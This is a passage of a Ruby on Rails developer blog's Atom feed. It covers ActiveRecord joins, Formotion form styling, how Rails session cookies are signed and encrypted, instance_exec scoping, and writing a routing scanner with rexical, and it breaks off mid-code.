Above query can also produceduplicate result. To see it let's create some sample data.</p><pre><code class="language-ruby">def self.setup  User.delete_all  Post.delete_all  u = User.create name: 'Neeraj'  u.posts.create! 
title: 'ruby', desc: 'ruby is awesome'  u.posts.create! title: 'rails', desc: 'rails is awesome'  u.posts.create! title: 'JavaScript', desc: 'JavaScript is awesome'  u = User.create name: 'Neil'  u.posts.create! title: 'JavaScript', desc: 'Javascript is awesome'  u = User.create name: 'Trisha'end</code></pre><p>With the above sample data if we execute <code>User.joins(:posts)</code> then this is theresult we get</p><pre><code class="language-plaintext">#&lt;User id: 9, name: &quot;Neeraj&quot;&gt;#&lt;User id: 9, name: &quot;Neeraj&quot;&gt;#&lt;User id: 9, name: &quot;Neeraj&quot;&gt;#&lt;User id: 10, name: &quot;Neil&quot;&gt;</code></pre><p>We can avoid the duplication by using <code>distinct</code> .</p><pre><code class="language-ruby">User.joins(:posts).select('distinct users.*').to_a</code></pre><p>Also if we want to make use of attributes from <code>posts</code> table then we need toselect them.</p><pre><code class="language-ruby">records = User.joins(:posts).select('distinct users.*, posts.title as posts_title').to_arecords.each do |user|  puts user.name  puts user.posts_titleend</code></pre><p>Note that using <code>joins</code> means if you use <code>user.posts</code> then another query will beperformed.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Background/header for Formotion forms in RubyMotion]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/set-formotion-background-and-header"/>
      <updated>2013-06-08T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/set-formotion-background-and-header</id>
      <content type="html"><![CDATA[<p><a href="https://github.com/clayallsopp/formotion">Formotion</a> for<a href="http://www.rubymotion.com/">Rubymotion</a> makes it a breeze to create views withforms. I am building a rubymotion app and my login form uses formotion. I neededto set background color for my form and here is how you can set a backgroundcolor for a form created using Formotion.</p><pre><code class="language-ruby">class LoginViewController &lt; Formotion::FormController  def viewDidLoad    super    view = UIView.alloc.init    view.backgroundColor = 0x838E61.uicolor    self.tableView.backgroundView = view  endend</code></pre><p>After the login view is done loading, I'm creating a new UIView and setting itsbackground color. Then this UIView object is set as the background view toformotion's table view.</p><h2>Setting header image</h2><p>If you want to add some branding to the login form, you can add a image to theform's header by adding the below code to <code>viewDidLoad</code>:</p><pre><code class="language-ruby">header_image = UIImage.imageNamed('header_image_name.png')header_view = UIImageView.alloc.initWithImage(header_image)self.tableView.tableHeaderView = header_view</code></pre><p>We are creating a <code>UIImageView</code> and initializing it with the image we want toshow in the header. Now, set the tableview's tableHeaderView value to theUIImageView we created.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Cookies on Rails]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/cookies-on-rails"/>
      <updated>2013-03-19T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/cookies-on-rails</id>
      <content type="html"><![CDATA[<p>Let's see how session data is handled in Rails 3.2 .</p><p>If you generate a Rails application in 3.2 then ,by default, you will see a fileat <code>config/initializers/session_store.rb</code>. The contents of this file issomething like this.</p><pre><code class="language-ruby">Demo::Application.config.session_store :cookie_store, key: '_demo_session'</code></pre><p>As we can see <code>_demo_session</code> is used as the key to store cookie data.</p><p>A single site can have cookies under different key. For example airbnb is using14 different keys to store cookie data.</p><p><img src="/blog_images/2013/cookies-on-rails/airbnb.png" alt="airbnb cookies"></p><h3>Session information</h3><p>Now let's see how Rails 3.2.13 stores session information.</p><p>In <code>3.2.13</code> version of Rails application I added following line to createsession data.</p><pre><code class="language-ruby">session[:github_username] = 'neerajsingh0101'</code></pre><p>Then I visit the action that executes above code. 
Now if I go and look forcookies for <code>localhost:3000</code> then this is what I see .</p><p><img src="/blog_images/2013/cookies-on-rails/Screenshot_3_19_13_11_33_PM.png" alt="demo session"></p><p>As you can see I have only one cookie with key <code>_demo_session</code> .</p><h2>Deciphering content of the cookie</h2><p>The cookie has following data.</p><pre><code class="language-plaintext">BAh7CEkiD3Nlc3Npb25faWQGOgZFRkkiJTgwZGFiNzhiYWZmYTc3NjU1ZmVmMGUxM2EzYmEyMDhhBjsAVEkiFGdpdGh1Yl91c2VybmFtZQY7AEZJIhJuZWVyYWpkb3RuYW1lBjsARkkiEF9jc3JmX3Rva2VuBjsARkkiMU1KTCs2dXVnRFo2R2NTdG5Kb3E2dm5BclZYRGJGbjJ1TXZEU0swamxyWU09BjsARg%3D%3D--b5bcce534ceab56616d4a215246e9eb1fc9984a4</code></pre><p>Let's open <code>rails console</code> and try to decipher this information.</p><pre><code class="language-ruby">content = 'BAh7CEkiD3Nlc3Npb25faWQGOgZFRkkiJTgwZGFiNzhiYWZmYTc3NjU1ZmVmMGUxM2EzYmEyMDhhBjsAVEkiFGdpdGh1Yl91c2VybmFtZQY7AEZJIhJuZWVyYWpkb3RuYW1lBjsARkkiEF9jc3JmX3Rva2VuBjsARkkiMU1KTCs2dXVnRFo2R2NTdG5Kb3E2dm5BclZYRGJGbjJ1TXZEU0swamxyWU09BjsARg%3D%3D--b5bcce534ceab56616d4a215246e9eb1fc9984a4'</code></pre><p>When the content is written to cookie then it is escaped. So first we need to<code>unescape</code> it.</p><pre><code class="language-ruby">&gt; unescaped_content = URI.unescape(content)=&gt; &quot;BAh7CEkiD3Nlc3Npb25faWQGOgZFRkkiJTgwZGFiNzhiYWZmYTc3NjU1ZmVmMGUxM2EzYmEyMDhhBjsAVEkiFGdpdGh1Yl91c2VybmFtZQY7AEZJIhJuZWVyYWpkb3RuYW1lBjsARkkiEF9jc3JmX3Rva2VuBjsARkkiMU1KTCs2dXVnRFo2R2NTdG5Kb3E2dm5BclZYRGJGbjJ1TXZEU0swamxyWU09BjsARg==--b5bcce534ceab56616d4a215246e9eb1fc9984a4&quot;</code></pre><p>Notice that towards the end <code>unescaped_content</code> has <code>--</code> . That is a separationmarker. The value before <code>--</code> is the real payload. 
The value after <code>--</code> is the digest of the data.</p><pre><code class="language-ruby">&gt; data, digest = unescaped_content.split('--')
=&gt; [&quot;BAh7CEkiD3Nlc3Npb25faWQGOgZFRkkiJTgwZGFiNzhiYWZmYTc3NjU1ZmVmMGUxM2EzYmEyMDhhBjsAVEkiFGdpdGh1Yl91c2VybmFtZQY7AEZJIhJuZWVyYWpkb3RuYW1lBjsARkkiEF9jc3JmX3Rva2VuBjsARkkiMU1KTCs2dXVnRFo2R2NTdG5Kb3E2dm5BclZYRGJGbjJ1TXZEU0swamxyWU09BjsARg==&quot;, &quot;b5bcce534ceab56616d4a215246e9eb1fc9984a4&quot;]</code></pre><p>The data is <code>Base64</code> encoded. So let's decode it.</p><pre><code class="language-ruby">&gt; Marshal.load(::Base64.decode64(data))
=&gt; {&quot;session_id&quot;=&gt;&quot;80dab78baffa77655fef0e13a3ba208a&quot;,
    &quot;github_username&quot;=&gt;&quot;neerajsingh0101&quot;,
    &quot;_csrf_token&quot;=&gt;&quot;MJL+6uugDZ6GcStnJoq6vnArVXDbFn2uMvDSK0jlrYM=&quot;}</code></pre><p>So we are able to get the data that is stored in the cookie. However we can't tamper with the cookie, because if we change the cookie data then the digest will not match.</p><p>Now let's see how Rails matches the digest.</p><p>In order to create the digest Rails makes use of <code>config/initializers/secret_token.rb</code>. In my case the file has the following content.</p><pre><code class="language-ruby">Demo::Application.config.secret_token = '111111111111111111111111111111'</code></pre><p>This secret token is used to create the digest.</p><pre><code class="language-ruby">&gt; secret_token = '111111111111111111111111111111'
&gt; OpenSSL::HMAC.hexdigest(OpenSSL::Digest.const_get('SHA1').new, secret_token, data)
=&gt; &quot;b5bcce534ceab56616d4a215246e9eb1fc9984a4&quot;</code></pre><p>Notice that the above produces a value that is the same as the <code>digest</code> from the earlier step. So if the cookie data is tampered with then the digest match will fail.
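The verification step can be captured in a small standalone helper. Here valid_digest? is a made-up name for illustration; the byte-by-byte comparison is a sketch of the kind of constant-time check a verifier should use:

```ruby
require 'openssl'

# Recompute the HMAC-SHA1 of the payload with the secret token and
# compare it against the digest that came with the cookie.
def valid_digest?(data, digest, secret_token)
  expected = OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new('SHA1'), secret_token, data)
  return false unless expected.bytesize == digest.bytesize

  # Constant-time comparison: inspect every byte so timing does not
  # reveal where the first mismatch occurs.
  expected.bytes.zip(digest.bytes).reduce(0) { |acc, (a, b)| acc | (a ^ b) }.zero?
end

secret  = '111111111111111111111111111111'
payload = 'some-base64-cookie-payload'
digest  = OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new('SHA1'), secret, payload)

puts valid_digest?(payload, digest, secret)              # => true
puts valid_digest?(payload + 'tampered', digest, secret) # => false
```

Without knowing secret, an attacker cannot produce a digest that makes valid_digest? return true for modified data.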
This is why it is absolute necessary that attacker should not be able toget access to <code>secret_token</code> value.</p><p>Did you notice that we can access the cookie data without needing<code>secret_token</code>. It means the data stored in cookie is not encrypted and anyonecan see it. That is why it is recommended that application should not store anysensitive information in cookie .</p><h2>Using cookie gives you more control</h2><p>In the previous example we used <code>session</code> to store and retrieve data fromcookie. We can directly use <code>cookie</code> and that gives us a little bit morecontrol.</p><h2>Using unsigned cookie</h2><pre><code class="language-ruby">cookies[:github_username] = 'neerajsingh0101'</code></pre><p>Now if we look at cookie stored in browser then this is what we see.</p><p><img src="/blog_images/2013/cookies-on-rails/Screenshot_3_20_13_9_49_PM.png" alt="update cookie"></p><p>As you can see now we have two keys in our cookie. One created by <code>session</code> andthe other one created by code written above.</p><p>Another thing to note is that the data stored for key <code>github_username</code> is not<code>Base64encoded</code> and it also does not have <code>--</code> to separate the data from thedigest. It means this type of cookie data can be tampered with by the user andthe Rails application will not be able to detect that the data has been tamperedwith.</p><p>Now let's try to sign the cookie data to make it tamper proof.</p><pre><code class="language-ruby">cookies.signed[:twitter_username] = 'neerajsingh0101'</code></pre><p>Now let's look at cookies in browser.</p><p><img src="/blog_images/2013/cookies-on-rails/Screenshot_3_20_13_9_54_PM.png" alt="update cookies"></p><p>This time we got data with another key <code>twitter_username</code> . Another thing tonotice is that cookie data is signed and is tamper proof.</p><p>When we use <code>session</code> then behind the scene it uses <code>cookies.signed</code>. 
That's whywe end up seeing signed data for key <code>_demo_session</code> .</p><h2>Tampering signed cookie</h2><p>What happens when user tampers with signed cookie data.</p><p>Rails does not raise any exception. However when you try to access cookie datathen nil is returned because the data has been tampered with.</p><h2>Security should be on by default</h2><p>session , by default, uses signed cookies which prevents any kind of tamperingof data but the data is still visible to users. It means we can't storesensitive information in session.</p><p>It would be nice if the session data is stored in encrypted format. And that'sthe topic of our next discussion.</p><h2>Rails 4 stores session data in encrypted format</h2><p>If you generate a Rails application in Rails 4 then ,by default, you will see afile at <code>config/initializers/session_store.rb</code> . The contents of this file issomething like</p><pre><code class="language-ruby">Demo::Application.config.session_store :cookie_store, key: '_demo_session'</code></pre><p>Also you will notice that file at <code>config/initializers/secret_token.rb</code> lookslike this .</p><pre><code class="language-ruby">Demo::Application.config.secret_key_base = 'b14e9b5b720f84fe02307ed16bc1a32ce6f089e10f7948422ccf3349d8ab586869c11958c70f46ab4cfd51f0d41043b7b249a74df7d53c7375d50f187750a0f5'</code></pre><p>Notice that in Rails 3.2.x the key was <code>secret_token</code>. 
Now the key is<code>secret_key_base</code> .</p><pre><code class="language-ruby">session[:github_username] = 'neerajsingh0101'</code></pre><p><img src="/blog_images/2013/cookies-on-rails/Screenshot_3_22_13_4_13_PM.png" alt="cookies and site data"></p><p>Cookie has following data.</p><pre><code class="language-ruby">RkxNUWo4NlBKakoyU1VqZWJIKzNaV0lQVVJwQjZhdUVTRnowVHppSVJ3Mk84TStoS1hndFZFNHlNaGw2RHBCc0ZiaEpsM0NtYTg4dnptcjFaQWVJbUdOaFh5MVlCdWVmSHBMNWpKbkRKR0JrSU5KZFYwVjVyWTZ3aUNqSWxJM1RTMkQybEtPUFE5VDFsZVJyakx0dFh3PT0tLTZ5NGIreU00Z0MyNnErS29SSGEyZkE9PQ%3D%3D--3f2fd67e4e7785933485a583720d29ba88bca15f</code></pre><p>Let's open <code>rails console</code> and try to decipher this information.</p><pre><code class="language-ruby">content = 'RkxNUWo4NlBKakoyU1VqZWJIKzNaV0lQVVJwQjZhdUVTRnowVHppSVJ3Mk84TStoS1hndFZFNHlNaGw2RHBCc0ZiaEpsM0NtYTg4dnptcjFaQWVJbUdOaFh5MVlCdWVmSHBMNWpKbkRKR0JrSU5KZFYwVjVyWTZ3aUNqSWxJM1RTMkQybEtPUFE5VDFsZVJyakx0dFh3PT0tLTZ5NGIreU00Z0MyNnErS29SSGEyZkE9PQ%3D%3D--3f2fd67e4e7785933485a583720d29ba88bca15f'</code></pre><p>When the content is written to cookie then it is escaped. So first we need to<code>unescape</code> it.</p><pre><code class="language-ruby">unescaped_content = URI.unescape(content)=&gt; &quot;RkxNUWo4NlBKakoyU1VqZWJIKzNaV0lQVVJwQjZhdUVTRnowVHppSVJ3Mk84TStoS1hndFZFNHlNaGw2RHBCc0ZiaEpsM0NtYTg4dnptcjFaQWVJbUdOaFh5MVlCdWVmSHBMNWpKbkRKR0JrSU5KZFYwVjVyWTZ3aUNqSWxJM1RTMkQybEtPUFE5VDFsZVJyakx0dFh3PT 0tLTZ5NGIreU00Z0MyNnErS29SSGEyZkE9PQ==--3f2fd67e4e7785933485a583720d29ba88bca15f&quot;</code></pre><p>Now we need <code>secret_key_base</code> value. 
And using that let's build a <code>key_generator</code>.</p><pre><code class="language-ruby">secret_key_base = 'b14e9b5b720f84fe02307ed16bc1a32ce6f089e10f7948422ccf3349d8ab586869c11958c70f46ab4cfd51f0d41043b7b249a74df7d53c7375d50f187750a0f5'

key_generator = ActiveSupport::KeyGenerator.new(secret_key_base, iterations: 1000)
key_generator = ActiveSupport::CachingKeyGenerator.new(key_generator)</code></pre><p>Our <code>MessageEncryptor</code> needs two long random strings for encryption. So let's generate two keys for the encryptor.</p><pre><code class="language-ruby">secret = key_generator.generate_key('encrypted cookie')
sign_secret = key_generator.generate_key('signed encrypted cookie')
encryptor = ActiveSupport::MessageEncryptor.new(secret, sign_secret)</code></pre><p>Now we can finally decipher the data.</p><pre><code class="language-ruby">data = encryptor.decrypt_and_verify(unescaped_content)
puts data
=&gt; neerajsingh0101</code></pre><p>As you can see we need the <code>secret_key_base</code> to make sense of the cookie data. So in Rails 4 the session data is encrypted, by default.</p><h2>How to migrate from Rails 3.x to Rails 4 without losing cookies</h2><p>Rails 4 will transparently upgrade cookies from unencrypted to encrypted cookies. This is a brilliant example of trivial choices removed by Rails.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Understanding instance exec in ruby]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/understanding-instance-exec-in-ruby"/>
      <updated>2013-03-12T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/understanding-instance-exec-in-ruby</id>
      <content type="html"><![CDATA[<p>In ruby procs have lexical scoping. What does that even mean. Let's start with asimple example.</p><pre><code class="language-ruby">square = lambda { x * x }x = 20puts square.call()# =&gt; undefined local variable or method `x' for main:Object (NameError)</code></pre><p>So even though variable <code>x</code> is present, the proc could not find it because whenthe code was read then <code>x</code> was missing .</p><p>Let's fix the code.</p><pre><code class="language-ruby">x = 2square = lambda { x * x }x = 20puts square.call()# =&gt; 400</code></pre><p>In the above case we got the answer. But the answer is <code>400</code> instead of <code>4</code> .That is because the proc binding refers to the variable <code>x</code>. The binding doesnot hold the value of the variable, it just holds the list of variablesavailable. In this case the value of <code>x</code> happens to be <code>20</code> when the code wasexecuted and the result is <code>400</code> .</p><p><code>x</code> does not have to a variable. It could be a method. Check this out.</p><pre><code class="language-ruby">square = lambda { x * x }def x  20endputs square.call()# =&gt; 400</code></pre><p>In the above case <code>x</code> is a method definition. Notice that binding is smartenough to figure out that since no <code>x</code> variable is present let's try and see ifthere is a method by name <code>x</code> .</p><h2>Another example of lexical binding in procs</h2><pre><code class="language-ruby">def square(p)   x = 2   puts p.callendx = 20square(lambda { x * x })#=&gt; 400</code></pre><p>In the above case the value of <code>x</code> is set as <code>20</code> at the code compile time.Don't get fooled by <code>x</code> being <code>2</code> inside the method call. 
Inside the method calla new scope starts and the <code>x</code> inside the method is not the same <code>x</code> as outside.</p><h2>Issues because of lexical scoping</h2><p>Here is a simple case.</p><pre><code class="language-ruby">class Person  code = proc { puts self }  define_method :name do    code.call()  endendclass Developer &lt; PersonendPerson.new.name # =&gt; PersonDeveloper.new.name # =&gt; Person</code></pre><p>In the above case when <code>Developer.new.name</code> is executed then output is <code>Person</code>.And that can cause problem. For example in Ruby on Rails at a number of places<code>self</code> is used to determine if the model that is being acted upon is <code>STI</code> ornot. If the model is <code>STI</code> then for <code>Developer</code> the query will have an extrawhere clause like <code>AND &quot;people&quot;.&quot;type&quot; IN ('Developer')</code> . So we need to find asolution so that <code>self</code> reports correctly for both <code>Person</code> and 'Developer` .</p><h2>instance_eval can change self</h2><p><a href="http://www.ruby-doc.org/core-2.0/BasicObject.html#method-i-instance_eval">instance_eval</a>can be used to change self. Here is refactored code using <code>instance_eval</code> .</p><pre><code class="language-ruby">class Person  code = proc { puts self }  define_method :name do    self.class.instance_eval &amp;code  endendclass Developer &lt; PersonendPerson.new.name #=&gt; PersonDeveloper.new.name #=&gt; Developer</code></pre><p>Above code produces right result. However <code>instance_eval</code> has one limitation. Itdoes not accept arguments. 
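As a quick standalone illustration of what we need instead, a block can both run with a different self and receive arguments; Greeter and block are made-up names for this sketch:

```ruby
class Greeter
  def name
    "world"
  end
end

# The block refers to both an argument (greeting) and a method on
# whatever object ends up being self (name).
block = proc { |greeting| "#{greeting}, #{name}!" }

# instance_exec switches self to the Greeter instance *and*
# forwards "Hello" into the block as its argument.
puts Greeter.new.instance_exec("Hello", &block)
# => Hello, world!
```

Inside the block, name resolves against the receiver of instance_exec, while greeting comes from the argument list.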
Let's change the proc to accept some arguments totest this theory out.</p><pre><code class="language-ruby">class Person  code = proc { |greetings| puts greetings; puts self }  define_method :name do    self.class.instance_eval 'Good morning', &amp;code  endendclass Developer &lt; PersonendPerson.new.nameDeveloper.new.name#=&gt; wrong number of arguments (1 for 0) (ArgumentError)</code></pre><p>In the above case we get an error. That's because <code>instance_eval</code> does notaccept arguments.</p><p>This is where <code>instance_exec</code> comes to rescue. It allows us to change <code>self</code> andit can also accept arguments.</p><h2>instance_exec to rescue</h2><p>Here is code refactored to use <code>instance_exec</code> .</p><pre><code class="language-ruby">class Person  code = proc { |greetings| puts greetings; puts self }  define_method :name do    self.class.instance_exec 'Good morning', &amp;code  endendclass Developer &lt; PersonendPerson.new.name #=&gt; Good morning PersonDeveloper.new.name #=&gt; Good morning Developer</code></pre><p>As you can see in the above code <code>instance_exec</code> reports correct <code>self</code> and theproc can also accept arguments .</p><h2>Conclusion</h2><p>I hope this article helps you understand why <code>instance_exec</code> is useful.</p><p>I scanned <a href="https://github.com/rails/rails">RubyOnRails source code</a> and foundaround 26 usages of <code>instance_exec</code> . Look at the usage of <code>instance_exec</code> usagethere to gain more understanding on this topic.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rex, Rexical and Rails routing]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/rex-rexical-and-rails-routing"/>
      <updated>2013-02-01T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rex-rexical-and-rails-routing</id>
      <content type="html"><![CDATA[<p><em>Please read <a href="journey-into-rails-routing">Journey into Rails routing</a> to get abackground on Rails routing discussion.</em></p><h2>A new language</h2><p>Let's say that the route definition looks like this.</p><pre><code class="language-plaintext">/page/:id(/:action)(.:format)</code></pre><p>The task at hand is to develop a new programming language which will understandthe rules of the route definitions. Since this language deals with <code>routes</code>let's call this language <code>Poutes</code> . Well <code>Pout</code> sounds better so let's roll withthat.</p><h2>It all begins with scanner</h2><p><a href="https://github.com/tenderlove/rexical">rexical</a> is a gem which generatesscanner generator. Notice that <code>rexical</code> is not a scanner itself. It willgenerate a scanner for the given rules. Let's give it a try.</p><p>Create a folder called <code>pout_language</code> and in that folder create a file called<code>pout_scanner.rex</code> . Notice that the extension of the file is <code>.rex</code> .</p><pre><code class="language-ruby">class PoutScannerend</code></pre><p>Before we proceed any further, let's compile to make sure it works.</p><pre><code class="language-plaintext">$ gem install rexical$ rex pout_scanner.rex -o pout_scanner.rb$ lspout_scanner.rb pout_scanner.rex</code></pre><p>While doing gem install do not do <code>gem install rex</code> . 
We are installing gemcalled <code>rexical</code> not <code>rex</code> .</p><h2>Time to add rules</h2><p>Now it's time to add rules to our <code>pout.rex</code> file.</p><p>Let's try to develop scanner which can detect difference between integers andstrings .</p><pre><code class="language-plaintext">class PoutScannerrule  \d+         { puts &quot;Detected number&quot; }  [a-zA-Z]+   { puts &quot;Detected string&quot; }end</code></pre><p>Regenerate the scanner .</p><pre><code class="language-plaintext">$ rex pout_scanner.rex -o pout_scanner.rb</code></pre><p>Now let's put the scanner to test . Let's create <code>pout.rb</code> .</p><pre><code class="language-ruby">require './pout_scanner.rb'class Pout  @scanner = PoutScanner.new  @scanner.tokenize(&quot;123&quot;)end</code></pre><p>You will get the error <code>undefined method</code>tokenize' for#<a href="PoutScanner:0x007f9630837980">PoutScanner:0x007f9630837980</a> (NoMethodError)` .</p><p>To fix this error open <code>pout_scanner.rex</code> and add inner section like this .</p><pre><code class="language-ruby">class PoutScannerrule  \d+         { puts &quot;Detected number&quot; }  [a-zA-Z]+   { puts &quot;Detected string&quot; }inner  def tokenize(code)    scan_setup(code)    tokens = []    while token = next_token      tokens &lt;&lt; token    end    tokens  endend</code></pre><p>Regenerate the scanner by executing <code>rex pout_scanner.rex -o pout_scanner.rb</code> .Now let's try to run <code>pout.rb</code> file.</p><pre><code class="language-ruby">$ ruby pout.rbDetected number</code></pre><p>So this time we got some result.</p><p>Now let's test for a string .</p><pre><code class="language-ruby"> require './pout_scanner.rb'class Pout  @scanner = PoutScanner.new  @scanner.tokenize(&quot;hello&quot;)end$ ruby pout.rbDetected string</code></pre><p>So the scanner is rightly identifying string vs integer. 
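For comparison, here is a hand-rolled version of the same tokenizer built on StringScanner from Ruby's standard library. It is a sketch of what the rexical-generated scanner does for us (HandRolledScanner is a made-up name, and the token-array form anticipates the rules we build next):

```ruby
require 'strscan'

# A tiny tokenizer equivalent to the rexical rules: integers and
# alphabetic strings, with whitespace skipped silently.
class HandRolledScanner
  def tokenize(code)
    ss = StringScanner.new(code)
    tokens = []
    until ss.eos?
      if ss.scan(/\s+/)
        # whitespace rule with no action: just skip it
      elsif (text = ss.scan(/\d+/))
        tokens << [:INTEGER, text.to_i]
      elsif (text = ss.scan(/[a-zA-Z]+/))
        tokens << [:STRING, text]
      else
        raise "can not match: '#{ss.rest}'"
      end
    end
    tokens
  end
end

p HandRolledScanner.new.tokenize("hello 123")
# => [[:STRING, "hello"], [:INTEGER, 123]]
```

Each rule is tried in order at the current scan position, exactly like the ordered rules in the .rex file.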
We are going to add alot more testing so let's create a test file so that we do not have to keepchanging the <code>pout.rb</code> file.</p><h2>Tests and Rake file</h2><p>This is our <code>pout_test.rb</code> file.</p><pre><code class="language-ruby">require 'test/unit'require './pout_scanner'class PoutTest  &lt; Test::Unit::TestCase  def setup    @scanner = PoutScanner.new  end  def test_standalone_string    assert_equal [[:STRING, 'hello']], @scanner.tokenize(&quot;hello&quot;)  endend</code></pre><p>And this is our <code>Rakefile</code> file .</p><pre><code class="language-ruby">require 'rake'require 'rake/testtask'task :generate_scanner do  `rex pout_scanner.rex -o pout_scanner.rb`endtask :default =&gt; [:generate_scanner, :test_units]desc &quot;Run basic tests&quot;Rake::TestTask.new(&quot;test_units&quot;) { |t|  t.pattern = '*_test.rb'  t.verbose = true  t.warning = true}</code></pre><p>Also let's change the <code>pout_scanner.rex</code> file to return an array instead of<code>puts</code> statements . 
The array contains information about the type of the element and its value.</p><pre><code class="language-ruby">class PoutScanner
rule
  \d+         { [:INTEGER, text.to_i] }
  [a-zA-Z]+   { [:STRING, text] }
inner
  def tokenize(code)
    scan_setup(code)
    tokens = []
    while token = next_token
      tokens &lt;&lt; token
    end
    tokens
  end
end</code></pre><p>With all this setup, now all we need to do is write tests and run <code>rake</code>.</p><h2>Tests for integer</h2><p>I added the following test and it passed.</p><pre><code class="language-ruby">def test_standalone_integer
  assert_equal [[:INTEGER, 123]], @scanner.tokenize(&quot;123&quot;)
end</code></pre><p>However the following test failed.</p><pre><code class="language-ruby">def test_string_and_integer
  assert_equal [[:STRING, 'hello'], [:INTEGER, 123]], @scanner.tokenize(&quot;hello 123&quot;)
end</code></pre><p>The test fails with the following message.</p><pre><code class="language-plaintext">  1) Error:
test_string_and_integer(PoutTest):
PoutScanner::ScanError: can not match: ' 123'</code></pre><p>Notice that in the error message there is a space before 123. So the scanner does not know how to handle a space. Let's fix that.</p><p>Here is the updated rule. We do not want any action to be taken when a space is detected. Now the test passes.</p><pre><code class="language-ruby">class PoutScanner
rule
  \s+
  \d+         { [:INTEGER, text.to_i] }
  [a-zA-Z]+   { [:STRING, text] }
inner
  def tokenize(code)
    scan_setup(code)
    tokens = []
    while token = next_token
      tokens &lt;&lt; token
    end
    tokens
  end
end</code></pre><h2>Back to routing business</h2><p>Now that we have some background on how scanning works, let's get back to the business at hand. The task is to properly parse a routing statement like <code>/page/:id(/:action)(.:format)</code>.</p><h2>Test for slash</h2><p>The simplest route is one with just <code>/</code>. 
Let's write a test and then a rule for it.</p><pre><code class="language-ruby">require 'test/unit'
require './pout_scanner'

class PoutTest &lt; Test::Unit::TestCase
  def setup
    @scanner = PoutScanner.new
  end

  def test_just_slash
    assert_equal [[:SLASH, '/']], @scanner.tokenize(&quot;/&quot;)
  end
end</code></pre><p>And here is the <code>.rex</code> file.</p><pre><code class="language-ruby">class PoutScanner
rule
  \/         { [:SLASH, text] }
inner
  def tokenize(code)
    scan_setup(code)
    tokens = []
    while token = next_token
      tokens &lt;&lt; token
    end
    tokens
  end
end</code></pre><h2>Test for /page</h2><p>Here is the test for <code>/page</code>.</p><pre><code class="language-ruby">def test_slash_and_literal
  assert_equal [[:SLASH, '/'], [:LITERAL, 'page']], @scanner.tokenize(&quot;/page&quot;)
end</code></pre><p>And here is the rule that was added.</p><pre><code class="language-ruby">  [a-zA-Z]+  { [:LITERAL, text] }</code></pre><h3>Test for /:page</h3><p>Here is the test for <code>/:page</code>.</p><pre><code class="language-ruby">def test_slash_and_symbol
  assert_equal [[:SLASH, '/'], [:SYMBOL, ':page']], @scanner.tokenize(&quot;/:page&quot;)
end</code></pre><p>And here are the rules.</p><pre><code class="language-ruby">rule
  \/          { [:SLASH, text]   }
  \:[a-zA-Z]+ { [:SYMBOL, text]  }
  [a-zA-Z]+   { [:LITERAL, text] }</code></pre><h2>Test for /(:page)</h2><p>Here is the test for <code>/(:page)</code>.</p><pre><code class="language-ruby">def test_symbol_with_paran
  assert_equal [[[:SLASH, '/'], [:LPAREN, '('], [:SYMBOL, ':page'], [:RPAREN, ')']]], @scanner.tokenize(&quot;/(:page)&quot;)
end</code></pre><p>And here is the new rule.</p><pre><code class="language-ruby">  \/\(\:[a-z]+\) { [[:SLASH, '/'], [:LPAREN, '('], [:SYMBOL, text[2..-2]], [:RPAREN, ')']] }</code></pre><p>We'll stop here and look at the final set of files.</p><h2>Final files</h2><p>This is the <code>Rakefile</code>.</p><pre><code class="language-ruby">require 'rake'
require 
'rake/testtask'

task :generate_scanner do
  `rex pout_scanner.rex -o pout_scanner.rb`
end

task :default =&gt; [:generate_scanner, :test_units]

desc &quot;Run basic tests&quot;
Rake::TestTask.new(&quot;test_units&quot;) { |t|
  t.pattern = '*_test.rb'
  t.verbose = true
  t.warning = true
}</code></pre><p>This is <code>pout_scanner.rex</code>.</p><pre><code class="language-ruby">class PoutScanner
rule
  \/\(\:[a-z]+\) { [[:SLASH, '/'], [:LPAREN, '('], [:SYMBOL, text[2..-2]], [:RPAREN, ')']] }
  \/          { [:SLASH, text]   }
  \:[a-zA-Z]+ { [:SYMBOL, text]  }
  [a-zA-Z]+   { [:LITERAL, text] }
inner
  def tokenize(code)
    scan_setup(code)
    tokens = []
    while token = next_token
      tokens &lt;&lt; token
    end
    tokens
  end
end</code></pre><p>This is <code>pout_test.rb</code>.</p><pre><code class="language-ruby">require 'test/unit'
require './pout_scanner'

class PoutTest &lt; Test::Unit::TestCase
  def setup
    @scanner = PoutScanner.new
  end

  def test_just_slash
    assert_equal [[:SLASH, '/']], @scanner.tokenize(&quot;/&quot;)
  end

  def test_slash_and_literal
    assert_equal [[:SLASH, '/'], [:LITERAL, 'page']], @scanner.tokenize(&quot;/page&quot;)
  end

  def test_slash_and_symbol
    assert_equal [[:SLASH, '/'], [:SYMBOL, ':page']], @scanner.tokenize(&quot;/:page&quot;)
  end

  def test_symbol_with_paran
    assert_equal [[[:SLASH, '/'], [:LPAREN, '('], [:SYMBOL, ':page'], [:RPAREN, ')']]], @scanner.tokenize(&quot;/(:page)&quot;)
  end
end</code></pre><h2>How scanner works</h2><p>Here we used <code>rex</code> to generate the scanner. Now take a look at <code>pout_scanner.rb</code>. Here is <a href="https://gist.github.com/4672018">that file</a>. Please take a look at this file and study the code. It is only 91 lines of code.</p><p>If you look at the code it is clear that scanning is not that hard. You can hand roll it without using a tool like <code>rex</code>. And that's exactly what Aaron Patterson did in <a href="http://github.com/rails/journey">Journey</a>. 
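A hand-rolled version of our routing scanner might look something like this sketch built on Ruby's <code>StringScanner</code>. It is an illustration of the idea only; it is not Journey's actual code.

```ruby
require 'strscan'

# A hand-rolled tokenizer sketch using Ruby's StringScanner.
# Hypothetical illustration; Journey's real scanner differs.
class HandRolledScanner
  def tokenize(code)
    ss = StringScanner.new(code)
    tokens = []
    until ss.eos?
      if text = ss.scan(/\//)
        tokens << [:SLASH, text]
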